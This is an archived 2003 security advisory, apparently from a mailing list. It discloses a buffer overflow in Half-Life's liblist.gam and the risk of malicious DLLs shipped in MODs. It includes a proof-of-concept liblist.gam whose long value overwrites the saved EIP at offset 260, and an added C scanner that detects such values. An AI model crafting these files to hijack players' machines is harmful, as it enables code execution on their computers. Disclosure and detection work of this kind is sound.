[Dshield] Half-Life: fun with MODs

Auriemma Luigi aluigi at pivx.com
Tue Jul 29 18:32:55 GMT 2003


######################################################################

Applications: Half-Life (http://half-life.sierra.com) MODs.
Versions:     1.1.1.0
Platforms:    Windows
Bugs:         Buffer overflow in liblist.gam and arbitrary code 
              execution through customized DLL files
Risk:         High
Author:       Auriemma Luigi
              Senior Security Researcher, PivX Solutions, LLC
              e-mail: aluigi at pivx.com
              web:    http://www.pivx.com/luigi/


######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix
5) Researcher's Philosophy


######################################################################

===============
1) Introduction
===============


Valve's Half-Life was released in 1998 but still remains the world's
most popular FPS game.

The success of the game is largely due to the overwhelming community
support, which has spawned a range of MODs for the game, including
the popular Counter-Strike MOD and Day Of Defeat.

The cause of these problems is MODs.
One of these problems is an inherent flaw in the basic structure of
Half-Life and cannot be fixed without fundamental changes.



######################################################################

======
2) Bug
======


The 2 bugs are:


---------------------------------
[A] Buffer-overflow in liblist.gam
---------------------------------

Liblist.gam is a text file present in every MOD. The problem is a
buffer overflow caused by an over-long value, which overwrites the
saved return address.

The following liblist.gam demonstrates the problem:

---liblist.gam---

game
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPxaaaaaaaaaaaa"
gamedll "what you want"

-----------------


The buffer overflow happens with a value of 276 bytes, and only when
the gamedll parameter is also specified.

NOTE: The important and "strange" thing to notice is that the saved
return address is overwritten by the 4 bytes at offset 260 of the
value, yet a value of 264 bytes is not enough: another 12 bytes must
follow them (276 in total) before the overflow occurs and the saved
EIP is actually overwritten.



--------------------------------------
[B] Do you know the DLL files in MODs?
--------------------------------------


Many MODs are distributed with custom DLL files, contained in the
folders "dlls" and "cl_dlls".

The problem is easily explained:

The DLL files used by MODs are real binary libraries that can contain
any code you want!
Which means that I can create a malicious DLL, distribute it with
a MOD, and everyone who uses it will run my malicious code.

This problem "CANNOT" be fixed by Valve, so be careful when you use an
unknown MOD or download a MOD from a non-trusted site.
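
Both findings above can be checked before a MOD is ever loaded. The C
program below is an added example written for this page, not Valve's
code and not part of the original advisory: it parses liblist.gam with
bounded copies (the shape any fix for bug [A] needs), flags a value long
enough to reach the saved return address at offset 260, rebuilds the
advisory's 276-byte layout to show where the four EIP bytes land, and
reports the DLL named by gamedll so the reviewer knows exactly which
native binary bug [B] is about. The file format it assumes (one key per
line, bare or double-quoted value, whitespace or a line break allowed
between key and value), the MAX_VALUE bound and the SAMPLE_OK contents
are assumptions of the example, not facts taken from the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not Valve's code, not the advisory's PoC): a liblist.gam
 * scanner. Assumed format: `key "value"` or `key value`, one pair per line,
 * whitespace or a line break between key and value; a quoted value may span
 * lines (the advisory's PoC is shown wrapped). */

#define MAX_ENTRIES 32
#define MAX_KEY     31
#define MAX_VALUE   127   /* assumed bound on what is kept; true length kept separately */
#define EIP_OFFSET  260   /* advisory: value bytes 260..263 land on the saved EIP */
#define CRASH_LEN   276   /* advisory: total value length that triggers the overflow */

typedef struct {
    char   key[MAX_KEY + 1];
    char   value[MAX_VALUE + 1]; /* bounded copy, never the full attacker string */
    size_t value_len;            /* true length as found in the file */
    int    truncated;            /* 1 if value[] holds fewer than value_len bytes */
} liblist_entry;

static int is_space(char c) { return c == ' ' || c == '\t' || c == '\r' || c == '\n'; }

/* Parse `text` into `out`, returning the entry count. Every copy is limited by
 * the destination size; an unbounded copy of the quoted value into a fixed
 * stack buffer is what a 276-byte value exploits in bug [A]. */
size_t liblist_parse(const char *text, liblist_entry *out, size_t max)
{
    size_t n = 0;
    for (const char *p = text; n < max; ) {
        while (is_space(*p)) p++;
        if (!*p) break;
        liblist_entry *e = &out[n++];
        memset(e, 0, sizeof *e);
        for (size_t k = 0; *p && !is_space(*p); p++)        /* key token */
            if (k < MAX_KEY) e->key[k++] = *p;
        while (is_space(*p)) p++;          /* value may start on the next line */
        const char *start;
        if (*p == '"') {                   /* quoted value, may span lines */
            for (start = ++p; *p && *p != '"'; p++) {}
            e->value_len = (size_t)(p - start);
            if (*p == '"') p++;
        } else {                           /* bare value: rest of the line */
            for (start = p; *p && *p != '\r' && *p != '\n'; p++) {}
            e->value_len = (size_t)(p - start);
        }
        size_t keep = e->value_len < MAX_VALUE ? e->value_len : MAX_VALUE;
        memcpy(e->value, start, keep);     /* bounded copy, never strcpy */
        e->truncated = keep < e->value_len;
    }
    return n;
}

/* Index of the first value at least `limit` bytes long, or -1. With
 * limit == EIP_OFFSET + 4, any value able to reach the saved EIP is flagged. */
int liblist_find_oversized(const liblist_entry *e, size_t n, size_t limit)
{
    for (size_t i = 0; i < n; i++)
        if (e[i].value_len >= limit) return (int)i;
    return -1;
}

/* The DLL the engine loads for this MOD (bug [B]): the native binary to hash
 * and vet before trusting an unknown MOD. NULL if the file names none. */
const char *liblist_gamedll(const liblist_entry *e, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(e[i].key, "gamedll") == 0) return e[i].value;
    return NULL;
}

/* Rebuild the advisory's layout: 260 filler bytes, the 4 `marker` bytes that
 * hit the saved return address ("EIPx" in the PoC), then 12 more filler bytes.
 * Returns CRASH_LEN, or 0 if `cap` cannot hold it plus a terminator. */
size_t build_poc_value(char *buf, size_t cap, const char marker[4])
{
    if (cap < CRASH_LEN + 1) return 0;
    memset(buf, 'a', CRASH_LEN);
    memcpy(buf + EIP_OFFSET, marker, 4);
    buf[CRASH_LEN] = '\0';
    return CRASH_LEN;
}

static const char SAMPLE_OK[] =        /* constructed benign sample, not a real MOD */
    "game \"My Mod\"\n"
    "version \"1.0\"\n"
    "gamedll \"dlls\\mymod.dll\"\n";

int main(void)
{
    liblist_entry ents[MAX_ENTRIES];
    char value[CRASH_LEN + 1], poc[CRASH_LEN + 64];
    size_t n = liblist_parse(SAMPLE_OK, ents, MAX_ENTRIES);
    printf("benign: %zu entries, gamedll=%s, oversized=%d\n", n,
           liblist_gamedll(ents, n), liblist_find_oversized(ents, n, EIP_OFFSET + 4));
    build_poc_value(value, sizeof value, "EIPx");   /* the advisory's PoC value */
    snprintf(poc, sizeof poc, "game\n\"%s\"\ngamedll \"what you want\"\n", value);
    n = liblist_parse(poc, ents, MAX_ENTRIES);
    int bad = liblist_find_oversized(ents, n, EIP_OFFSET + 4);
    printf("poc: %zu-byte value, \"%.4s\" at offset %d, flagged key=%s\n", ents[0].value_len,
           value + EIP_OFFSET, EIP_OFFSET, bad >= 0 ? ents[bad].key : "none");
    return 0;
}
```

Build it with `cc -std=c99 -Wall liblist_scan.c` (file name is a
suggestion). Reading the liblist.gam of a downloaded MOD from disk is
left out so the example stays self-contained; the limit passed to
liblist_find_oversized is deliberately EIP_OFFSET + 4 rather than
CRASH_LEN, because the 12 trailing bytes only matter for reliably
triggering the crash, while any value that reaches offset 263 already
controls the saved return address.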



######################################################################

===========
3) The Code
===========


---------------------------------
[A] Buffer-overflow in liblist.gam
---------------------------------

---liblist.gam---

game
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaEIPxaaaaaaaaaaaa"
gamedll "what you want"

-----------------



--------------------------------------
[B] Do you know the DLL files in MODs?
--------------------------------------


Create a Half-Life DLL or add any malicious code to an existing DLL.



#######################################################################

======
4) Fix
======


Valve was notified of these vulnerabilities on April 14 2003, and replied
that they were working to patch these bugs.

Since that last point of contact, Valve and its representatives have
been contacted on multiple occasions for a status update on the patch,
without any replies.



#######################################################################

==========================
5) Researcher's Philosophy
==========================


Be free.
The researchers' community needs your reversing, your programs, and
your research. Never let your passion die and don't stop your work!

Disclosure:
Full and responsible disclosure can lead to a quick fix, and prevent a 
problem before it gets into the wrong hands.



#######################################################################

====================
About PivX Solutions
====================


PivX Solutions is a premier network security consultancy offering a
myriad of network security services to our clients.

For more information go to http://www.PivX.com


#######################################################################



--- 
Researcher
http://www.pivx.com/luigi/
